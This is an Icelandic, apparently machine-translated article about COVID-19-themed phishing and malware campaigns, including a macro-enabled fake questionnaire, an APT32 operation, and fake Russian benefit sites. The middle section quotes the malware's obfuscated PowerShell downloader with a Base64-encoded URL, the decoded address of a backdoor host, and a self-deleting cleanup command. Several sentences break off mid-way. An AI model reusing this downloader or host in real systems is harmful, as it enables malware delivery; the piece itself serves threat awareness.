Árásarmenn halda áfram að nýta sér COVID-19 umræðuefnið og skapa sífellt fleiri ógnir fyrir notendur sem hafa mikinn áhuga á öllu sem tengist faraldri. IN
Mundu inn
Viltu fá ókeypis próf fyrir COVID-19?
Annað markvert dæmi um veiðar með kransæðaveirum var
Það var líka auðvelt að sannfæra flesta notendur um að virkja fjölvi. Til þess var venjulegt bragð notað: til að fylla út spurningalistann þarftu fyrst að virkja fjölvi, sem þýðir að þú þarft að keyra VBA skriftu.
Eins og þú sérð er VBA handritið sérstaklega dulið frá vírusvörnum.
Windows er með biðaðgerð þar sem forritið bíður /T <sekúndur> áður en það samþykkir sjálfgefið „Já“ svar. Í okkar tilviki beið handritið í 65 sekúndur áður en tímabundnum skrám var eytt:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
Og á meðan beðið var var malware hlaðið niður. Sérstakt PowerShell handrit var hleypt af stokkunum fyrir þetta:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
Eftir að hafa afkóðuð Base64 gildið, hleður PowerShell handritinu niður bakdyrinu sem staðsett er á vefþjóninum sem áður var hakkað frá Þýskalandi:
http://automatischer-staubsauger.com/feature/777777.png
og vistar það undir nafninu:
C:UsersPublictmpdirfile1.exe
Mappa ‘C:UsersPublictmpdir’
er eytt þegar 'tmps1.bat' skráin sem inniheldur skipunina er keyrð cmd /c mkdir ""C:UsersPublictmpdir"".
Markviss árás á ríkisstofnanir
Að auki greindu FireEye sérfræðingar nýlega frá markvissri APT32 árás sem stefnt var að stjórnvöldum í Wuhan, sem og kínverska neyðarstjórnunarráðuneytinu. Einn af dreifðu RTFs innihélt tengil á New York Times grein sem ber yfirskriftina
Athyglisvert er að við uppgötvun greindi enginn vírusvarnarefni þetta tilvik, samkvæmt Virustotal.
Þegar opinberar vefsíður liggja niðri
Mest sláandi dæmið um vefveiðarárás átti sér stað í Rússlandi um daginn. Ástæða þess var skipun langþráðra bóta fyrir börn á aldrinum 3 til 16 ára. Þegar tilkynnt var um upphaf móttöku umsókna þann 12. maí 2020, hlupu milljónir á vefsíðu Ríkisþjónustunnar til að fá langþráða hjálp og felldu gáttina ekki verri en fagleg DDoS árás. Þegar forsetinn sagði að „Ríkisþjónustan gæti ekki ráðið við flæði umsókna,“ byrjaði fólk að tala á netinu um að opna aðra síðu til að samþykkja umsóknir.
Vandamálið er að nokkrar síður byrjuðu að virka í einu, og á meðan ein, sú raunverulega á posobie16.gosuslugi.ru, tekur í raun við umsóknum, meira
Samstarfsmenn frá SearchInform fundu um 30 ný svikalén á .ru svæðinu. Infosecurity og Softline Company hafa fylgst með meira en 70 svipuðum fölsuðum ríkisþjónustuvefsíðum síðan í byrjun apríl. Höfundar þeirra vinna með kunnugleg tákn og nota einnig samsetningar af orðunum gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie, og svo framvegis.
Hype og félagsverkfræði
Öll þessi dæmi staðfesta aðeins að árásarmenn hafa tekist að afla tekna af efni kórónavírus. Og því meiri sem félagsleg spenna er og því óljósari mál, því meiri líkur hafa svindlarar á að stela mikilvægum gögnum, neyða fólk til að gefa upp peningana sína á eigin spýtur eða einfaldlega hakka fleiri tölvur.
Og í ljósi þess að heimsfaraldurinn hefur neytt hugsanlega óundirbúið fólk til að vinna að heiman í massavís, eru ekki aðeins persónuleg, heldur einnig fyrirtækjagögn í hættu. Til dæmis voru nýlega Microsoft 365 (áður Office 365) notendur einnig fyrir veðveiðum. Fólk fékk gríðarleg „misst“ raddskilaboð sem viðhengi við bréf. Hins vegar voru skrárnar í raun HTML síða sem sendi fórnarlömb árásarinnar á
Heimild: www.habr.com